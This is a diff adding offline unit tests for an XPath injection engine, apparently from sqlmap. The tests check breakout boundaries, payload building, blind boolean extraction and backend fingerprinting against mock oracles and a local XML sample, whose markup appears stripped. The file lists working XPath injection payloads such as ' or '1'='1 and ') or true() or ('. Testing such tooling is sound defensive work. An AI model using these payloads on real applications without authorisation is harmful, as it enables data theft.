diff --git a/tests/test_xpath.py b/tests/test_xpath.py
new file mode 100644
index 0000000000..2c3dcfac1a
--- /dev/null
+++ b/tests/test_xpath.py
@@ -0,0 +1,443 @@
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org)
+See the file 'LICENSE' for copying permission
+
+Offline, deterministic tests for the XPath injection engine. Mock oracles stand in for the
+HTTP/lxml layer so detection, fingerprinting, blind inference, payload building, and output
+formatting can be exercised without a live target.
+"""
+
+import unittest
+
+from _testutils import bootstrap
+bootstrap()
+
+import lib.techniques.xpath.inject as xpath
+
+
+SENTINEL = xpath.SENTINEL
+
+
+class TestHelpers(unittest.TestCase):
+ def test_ratio(self):
+ self.assertGreater(xpath._ratio("abc", "abc"), 0.9)
+ self.assertLess(xpath._ratio("abc", "xyz"), 0.5)
+
+ def test_delim(self):
+ from lib.core.enums import PLACE
+ self.assertEqual(xpath._delim(PLACE.GET), '&')
+ self.assertEqual(xpath._delim(PLACE.COOKIE), ';')
+
+ def test_is_error(self):
+ self.assertTrue(xpath._isError("javax.xml.xpath.XPathExpressionException: error"))
+ self.assertTrue(xpath._isError("lxml.etree.XPathEvalError: Invalid expression"))
+ self.assertFalse(xpath._isError("normal page content"))
+
+ def test_backend_from_error(self):
+ self.assertIsNotNone(xpath._backendFromError("lxml.etree.XPathEvalError: Invalid expression"))
+ self.assertIsNotNone(xpath._backendFromError("System.Xml.XPath.XPathException: has an invalid token"))
+ self.assertIsNone(xpath._backendFromError("normal page"))
+
+ def test_is_password_param(self):
+ self.assertTrue(xpath._isPasswordParam("password"))
+ self.assertTrue(xpath._isPasswordParam("pass"))
+ self.assertFalse(xpath._isPasswordParam("username"))
+
+ def test_xpath_quote(self):
+ self.assertEqual(xpath._xpathQuote("hello"), "'hello'")
+ self.assertEqual(xpath._xpathQuote("it's"), "\"it's\"")
+ self.assertEqual(xpath._xpathQuote('say "hi"'), "'say \"hi\"'")
+ both = "it's \"great\""
+ q = xpath._xpathQuote(both)
+ self.assertIn("concat", q)
+
+ def test_make_payload_with_suffix(self):
+ b = xpath.Boundary("') or ", " or ('", True)
+ p = xpath._makePayload("x", b, "starts-with(name(/*),'d')")
+ self.assertEqual(p, "x') or starts-with(name(/*),'d') or ('")
+
+ def test_make_payload_no_suffix(self):
+ b = xpath.Boundary("' or ", "", True)
+ p = xpath._makePayload("x", b, "1=1")
+ self.assertEqual(p, "x' or 1=1")
+
+ def test_make_payload_with_suffix_only(self):
+ b = xpath.Boundary("' or ", " and '1'='1", True)
+ p = xpath._makePayload("x", b, "1=1")
+ self.assertEqual(p, "x' or 1=1 and '1'='1")
+
+
+class TestBoundaryTable(unittest.TestCase):
+ def test_all_entries_in_boundary_lookup(self):
+ for bk in xpath.XPATH_BREAKOUT_PREFIXES:
+ self.assertIn(bk, xpath._BREAKOUT_BOUNDARY,
+ "Breakout '%s' not found in _BREAKOUT_BOUNDARY" % bk)
+
+ def test_function_arg_boundaries_are_extractable(self):
+ for bk in ("') or true() or ('", "') or '1'='1' or ('", "') or 1=1 or ('"):
+ b = xpath._BREAKOUT_BOUNDARY[bk]
+ self.assertTrue(b.extractable)
+ self.assertTrue(len(b.prefix) > 0)
+ self.assertTrue(len(b.suffix) > 0)
+
+ def test_simple_string_boundaries_have_suffix(self):
+ for bk in ("' or '1'='1", "' or true() or '", "' or 1=1 or '",
+ '" or "1"="1', '" or true() or "'):
+ b = xpath._BREAKOUT_BOUNDARY[bk]
+ if b is not None:
+ self.assertTrue(b.extractable)
+ self.assertTrue(len(b.suffix) > 0,
+ "Simple string breakout '%s' needs a suffix to absorb the trailing quote" % bk)
+
+ def test_union_wildcard_is_not_extractable(self):
+ b = xpath._BREAKOUT_BOUNDARY.get("']|//*|test['")
+ self.assertIsNone(b, "Union wildcard must not have an extraction boundary")
+
+ def test_numeric_has_leading_space(self):
+ for bk in (" or 1=1", " or true()"):
+ self.assertTrue(bk.startswith(" "),
+ "Numeric breakout '%s' needs leading whitespace" % bk)
+ b = xpath._BREAKOUT_BOUNDARY[bk]
+ self.assertTrue(b.extractable)
+
+ def test_all_extractable_have_prefix(self):
+ for bk, b in xpath._BREAKOUT_BOUNDARY.items():
+ if b is not None:
+ self.assertTrue(len(b.prefix) > 0,
+ "Extractable boundary for '%s' needs a prefix" % bk)
+
+
+class TestPayloadBuilder(unittest.TestCase):
+ def setUp(self):
+ self.boundary = xpath._BREAKOUT_BOUNDARY["') or true() or ('"]
+ self.builder = xpath._XPathPayloadBuilder("x", self.boundary)
+
+ def test_name_starts_with(self):
+ p = self.builder.nameStartsWith("/*", "d")
+ self.assertIn("starts-with(name(/*)", p)
+ self.assertIn("'d'", p)
+
+ def test_name_length(self):
+ p = self.builder.nameLength("/*", 9)
+ self.assertIn("string-length(name(/*))=9", p)
+
+ def test_child_count(self):
+ p = self.builder.childCount("/*", 3)
+ self.assertIn("count(/*/*)>=3", p)
+
+ def test_attribute_count(self):
+ p = self.builder.attributeCount("/*[1]", 2)
+ self.assertIn("count(/*[1]/@*)>=2", p)
+
+ def test_text_starts_with(self):
+ p = self.builder.textStartsWith("/*[1]/*[1]", "lut")
+ self.assertIn("starts-with(string(/*[1]/*[1])", p)
+
+ def test_empty_prefix(self):
+ p = self.builder.nameStartsWith("/*", "")
+ self.assertIn("''", p)
+
+ def test_uses_boundary_not_hardcoded(self):
+ p = self.builder.nameStartsWith("/*", "d")
+ self.assertNotIn("contains(username", p)
+ self.assertIn("x') or ", p)
+ self.assertIn(" or ('", p)
+
+ def test_simple_string_boundary_builder(self):
+ b = xpath._BREAKOUT_BOUNDARY["' or '1'='1"]
+ builder = xpath._XPathPayloadBuilder("x", b)
+ p = builder.nameStartsWith("/*", "d")
+ self.assertIn("x' or ", p)
+ self.assertIn(" and '1'='1", p)
+
+
+class TestBooleanDetection(unittest.TestCase):
+ def setUp(self):
+ self.original_send = xpath._send
+
+ def tearDown(self):
+ xpath._send = self.original_send
+
+ def test_false_page_must_be_reproducible(self):
+ # True is stable, false changes every time -> no oracle
+ true_calls = [0]
+
+ def mock(place, parameter, value):
+ if "true()" in value:
+ return "true-page"
+ elif "false()" in value:
+ true_calls[0] += 1
+ return "false-page-%d" % true_calls[0]
+ return "default"
+
+ xpath._send = mock
+ template, payload, boundary = xpath._detectBoolean("GET", "q")
+ self.assertIsNone(template)
+
+ def test_detection_returns_extractable_boundary(self):
+ def mock(place, parameter, value):
+ if "true()" in value:
+ return '{"count":7,"entries":[{...}]}'
+ elif "false()" in value:
+ return '{"count":0,"entries":[],"error":null}'
+ return "default"
+
+ xpath._send = mock
+ template, payload, boundary = xpath._detectBoolean("GET", "q")
+ self.assertIsNotNone(template)
+ self.assertIsNotNone(boundary)
+ self.assertTrue(boundary.extractable)
+
+
+class TestGridAndTable(unittest.TestCase):
+ def test_grid(self):
+ columns = ["Path", "Element", "Value"]
+ rows = [["/*", "root", ""], ["/*[1]", "child", "text"]]
+ grid = xpath._grid(columns, rows)
+ self.assertIn("Path", grid)
+ self.assertIn("root", grid)
+
+ def test_grid_empty(self):
+ grid = xpath._grid([], [])
+ self.assertIn("+", grid)
+
+ def test_tree_to_table(self):
+ node = {
+ "name": "directory", "path": "/*",
+ "children": [{"name": "user", "path": "/*[1]", "children": [],
+ "attributes": [{"name": "id", "value": "1"}], "text": None}],
+ "attributes": [], "text": None,
+ }
+ columns, rows = xpath._treeToTable(node)
+ self.assertIn("Path", columns)
+ self.assertGreater(len(rows), 0)
+
+
+class TestExtraction(unittest.TestCase):
+ def test_infer_value_mock(self):
+ expected = "directory"
+ boundary = xpath._BREAKOUT_BOUNDARY["') or true() or ('"]
+ builder = xpath._XPathPayloadBuilder("x", boundary)
+
+ class MockOracle(object):
+ def extract(self, payload):
+ import re
+ m = re.search(r"""starts-with\(name\(/\*\),'([^']*)'\)""", payload)
+ return expected.startswith(m.group(1)) if m else False
+
+ oracle = MockOracle()
+ result = xpath._inferValue(oracle, builder, "/*",
+ lambda b, p, prefix: b.nameStartsWith(p, prefix),
+ maxLen=20)
+ self.assertEqual(result, expected)
+
+ def test_infer_count(self):
+ expected = 3
+ boundary = xpath._BREAKOUT_BOUNDARY["') or true() or ('"]
+ builder = xpath._XPathPayloadBuilder("x", boundary)
+
+ class MockOracle(object):
+ def extract(self, payload):
+ import re
+ m = re.search(r"count\(/\*/\*\)>=(\d+)", payload)
+ if m:
+ return int(m.group(1)) <= expected
+ return False
+
+ oracle = MockOracle()
+ result = xpath._inferCount(oracle, builder, "/*",
+ lambda b, p, c: b.childCount(p, c),
+ maxCount=8)
+ self.assertEqual(result, expected)
+
+ def test_infer_string_binary_search(self):
+ # Drive the binary-search extractor through real lxml evaluation of the
+ # boundary-wrapped predicates against _XML and confirm exact recovery.
+ boundary = xpath._BREAKOUT_BOUNDARY["') or true() or ('"]
+ builder = xpath._XPathPayloadBuilder("x", boundary)
+ template = _XPATH_TEMPLATES["function_arg"]
+
+ class MockOracle(object):
+ def extract(self, payload):
+ return _xpath_eval(template, payload) > 0
+
+ oracle = MockOracle()
+ # Absolute targets are resolved the same way the live tree-walk would.
+ self.assertEqual(xpath._inferString(oracle, builder, "name(/*)", maxLen=32), "directory")
+ self.assertEqual(xpath._inferString(oracle, builder, "string(//user[1]/name)", maxLen=32), "luther")
+ self.assertEqual(xpath._inferString(oracle, builder, "string(//user[1]/@id)", maxLen=32), "1")
+
+ def test_infer_string_matches_linear(self):
+ # The fast extractor must agree with the legacy linear extractor.
+ boundary = xpath._BREAKOUT_BOUNDARY["') or true() or ('"]
+ builder = xpath._XPathPayloadBuilder("x", boundary)
+ template = _XPATH_TEMPLATES["function_arg"]
+
+ class MockOracle(object):
+ def extract(self, payload):
+ return _xpath_eval(template, payload) > 0
+
+ oracle = MockOracle()
+ fast = xpath._inferString(oracle, builder, "name(/*)", maxLen=32)
+ linear = xpath._inferValue(oracle, builder, "/*",
+ lambda b, p, prefix: b.nameStartsWith(p, prefix),
+ maxLen=32)
+ self.assertEqual(fast, linear)
+
+
+class TestBackendFingerprint(unittest.TestCase):
+ def test_lxml(self):
+ page = "lxml.etree.XPathEvalError: Invalid expression"
+ backend = xpath._backendFromError(page)
+ self.assertIsNotNone(backend)
+ self.assertIn("lxml", backend)
+
+ def test_java_jaxp(self):
+ page = "javax.xml.xpath.XPathExpressionException: A location path was expected"
+ backend = xpath._backendFromError(page)
+ self.assertIsNotNone(backend)
+
+ def test_dotnet(self):
+ page = "System.Xml.XPath.XPathException: Expression must evaluate to a node-set"
+ backend = xpath._backendFromError(page)
+ self.assertIsNotNone(backend)
+
+ def test_no_error(self):
+ page = "Normal page with user data"
+ backend = xpath._backendFromError(page)
+ self.assertIsNone(backend)
+
+
+# --- Real XPath syntax validation (lxml) ---------------------------------------
+
+_XML = b"""lutherfluffy"""
+
+_XPATH_TEMPLATES = {
+ "function_arg": "//user[contains(name,'%s')]",
+ "single_quoted": "//user[name='%s']",
+ "double_quoted": '//user[name="%s"]',
+ "numeric": "//user[position()=%s]",
+ "bare_predicate": "//user[%s]",
+}
+
+
+def _xpath_eval(template, payload):
+ """Evaluate an XPath expression against _XML, return the match count."""
+ try:
+ from lxml import etree
+ except ImportError:
+ raise unittest.SkipTest("lxml not available")
+ root = etree.fromstring(_XML)
+ expr = template % payload
+ return len(root.xpath(expr))
+
+
+class TestRealXPathSyntax(unittest.TestCase):
+ """Verify that detection payloads and extraction predicates are syntactically
+ valid XPath and produce the expected boolean results."""
+
+ @staticmethod
+ def _count(template, payload):
+ return _xpath_eval(template, payload)
+
+ def _test_family(self, template_key, true_breakout, false_breakout, boundary_key, original="x"):
+ template = _XPATH_TEMPLATES[template_key]
+ boundary = xpath._BREAKOUT_BOUNDARY[boundary_key]
+ self.assertIsNotNone(boundary)
+ self.assertTrue(boundary.extractable)
+
+ # Detection payloads must be syntactically valid and yield true/false
+ truePayload = original + true_breakout
+ falsePayload = original + false_breakout
+ self.assertGreater(self._count(template, truePayload), 0,
+ "True payload '%s' should match at least one node" % truePayload)
+ self.assertEqual(self._count(template, falsePayload), 0,
+ "False payload '%s' should match no nodes" % falsePayload)
+
+ # Extraction predicate must be valid and change the result truthfully
+ self.assertIsNotNone(xpath._XPathPayloadBuilder(original, boundary))
+ truePred = xpath._makePayload(original, boundary, "true()")
+ falsePred = xpath._makePayload(original, boundary, "false()")
+ self.assertGreater(self._count(template, truePred), 0,
+ "Extraction true predicate must match")
+ self.assertEqual(self._count(template, falsePred), 0,
+ "Extraction false predicate must not match")
+
+ def test_function_arg_family(self):
+ self._test_family("function_arg",
+ "') or true() or ('", "') and false() and ('",
+ "') or true() or ('")
+
+ def test_single_quoted_family(self):
+ self._test_family("single_quoted",
+ "' or '1'='1", "' and '1'='2",
+ "' or '1'='1")
+
+ def test_double_quoted_family(self):
+ self._test_family("double_quoted",
+ '" or "1"="1', '" and "1"="2',
+ '" or "1"="1')
+
+ def test_numeric_family(self):
+ self._test_family("numeric",
+ " or 1=1", " and 1=2",
+ " or 1=1", original="1")
+
+ def test_bare_predicate_family(self):
+ self._test_family("bare_predicate",
+ " or true()", " and false()",
+ " or true()", original="1")
+
+ def test_function_arg_second_variant(self):
+ self._test_family("function_arg",
+ "') or '1'='1' or ('", "') and '1'='2' and ('",
+ "') or '1'='1' or ('")
+
+ def test_single_quoted_with_matching_original(self):
+ """When the original value matches a record (name='luther'), OR-style
+ extraction with 'and' suffix is still decisive because the engine uses
+ a non-matching sentinel base for tree-walking."""
+ boundary = xpath._BREAKOUT_BOUNDARY["' or '1'='1"]
+ # Simulate what xpathScan() does: use a sentinel as base for OR-style
+ sentinel = "zzznotpresent"
+ self.assertIsNotNone(xpath._XPathPayloadBuilder(sentinel, boundary))
+ truePred = xpath._makePayload(sentinel, boundary, "true()")
+ falsePred = xpath._makePayload(sentinel, boundary, "false()")
+ tpl = _XPATH_TEMPLATES["single_quoted"]
+ self.assertGreater(self._count(tpl, truePred), 0,
+ "OR extraction must match with sentinel base + true predicate")
+ self.assertEqual(self._count(tpl, falsePred), 0,
+ "OR extraction must not match with sentinel base + false predicate")
+
+ def test_all_extractable_boundaries_have_valid_extraction(self):
+ # Match each boundary to an appropriate template and original value.
+ _CONTEXT = {
+ "') or true() or ('": ("function_arg", "x"),
+ "') or '1'='1' or ('": ("function_arg", "x"),
+ "') or 1=1 or ('": ("function_arg", "x"),
+ '") or true() or ("': ("function_arg", "x"),
+ "' or '1'='1": ("single_quoted", "x"),
+ "' or true() or '": ("single_quoted", "x"),
+ "' or 1=1 or '": ("single_quoted", "x"),
+ "' and '1'='1": ("single_quoted", "x"),
+ '" or "1"="1': ("double_quoted", "x"),
+ '" or true() or "': ("double_quoted", "x"),
+ " or 1=1": ("numeric", "999"),
+ " or true()": ("bare_predicate", "999"),
+ }
+ for bk, boundary in xpath._BREAKOUT_BOUNDARY.items():
+ if boundary is None or not boundary.extractable:
+ continue
+ tkey, original = _CONTEXT.get(bk, ("function_arg", "x"))
+ template = _XPATH_TEMPLATES[tkey]
+ payload = xpath._makePayload(original, boundary, "true()")
+ try:
+ count = self._count(template, payload)
+ except unittest.SkipTest:
+ raise # lxml unavailable -> skip cleanly; SkipTest is an Exception, so the broad except below would otherwise mask it into a failure
+ except Exception as e:
+ self.fail("Boundary '%s' in '%s' with orig='%s' invalid: %s\n payload: %s" % (bk, tkey, original, e, payload))
+ self.assertIsInstance(count, int,
+ "Boundary '%s' in '%s' produced no count" % (bk, tkey))